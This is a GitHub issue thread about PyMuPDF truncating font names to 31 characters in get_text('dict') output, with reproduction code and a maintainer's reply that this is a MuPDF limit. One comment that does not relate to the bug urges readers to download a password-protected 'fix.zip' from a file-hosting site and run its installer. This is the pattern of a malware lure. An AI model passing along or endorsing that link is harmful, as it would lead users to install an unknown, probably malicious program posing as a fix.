### ISSUE TITLE
truncated font names

### ISSUE THREAD

**Issue by ASTimch** [pymupdf/PyMuPDF#3823]
### Description of the bug

Text names extrated through doc.get_page_fonts(0, True) and through Page.get_text("dict") -> blocks -> spans -> lines["font"] differ. The text extracted via Page.get_text("dict") -> blocks -> spans -> lines["font"]  truncated to 31 characters.

### How to reproduce the bug

Code sample:
```
def get_wrong_fonts(doc: fitz.Document):
    page_font_names = [font[3] for font in doc.get_page_fonts(0, True)]
    text_fonts = set()
    dict = doc[0].get_text("dict")
    blocks = dict["blocks"]
    for block in blocks:
        if "lines" in block.keys():
            spans = block["lines"]
            for span in spans:
                data = span["spans"]
                for lines in data:
                    text_fonts.add(lines["font"])
    print(page_font_names)
    print(text_fonts)


if __name__ == "__main__":
    fitz.TOOLS.set_subset_fontnames(on=True)
    with fitz.open("50.pdf") as doc:
        get_wrong_fonts(doc)
```
Result
```
['MEAYLN+Times New Roman Bold', 'LFDXFI+Times New Roman Bold Italic', 'PHQGHU+Times New Roman', 'Calibri-Identity-H', 'BFGGJL+TimesNewRomanPS-BoldItalicMT', 'BFGEPF+TimesNewRomanPS-BoldMT', 'BFGEPI+TimesNewRomanPSMT']
{'MEAYLN+Times New Roman Bold', 'BFGFDP+Calibri', 'PHQGHU+Times New Roman', 'BFGGJL+TimesNewRomanPS-BoldItal', 'LFDXFI+Times New Roman Bold Ita', 'BFGEPF+TimesNewRomanPS-BoldMT', 'BFGEPI+TimesNewRomanPSMT'}
```
In the second output (for set) font names  'BFGGJL+TimesNewRomanPS-BoldItal', 'LFDXFI+Times New Roman Bold Ita' are truncated to 31 character.
Is it bug, or it is a feature and we have to deal with it?
Thank you.
[50.pdf](https://github.com/user-attachments/files/16801165/50.pdf)

### PyMuPDF version

1.24.9

### Operating system

Windows

### Python version

3.11

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JorjMcKie** [comment]
This is not a bug but a built-in restriction of MuPDF.

**Comment by ASTimch** [comment]
> This is not a bug but a built-in restriction of MuPDF.

Thank you for quick response. One question: is it possble to bypass such restriction with flags (or somehow)?

**Comment by JorjMcKie** [comment]
No, there is no way around this unfortunately.
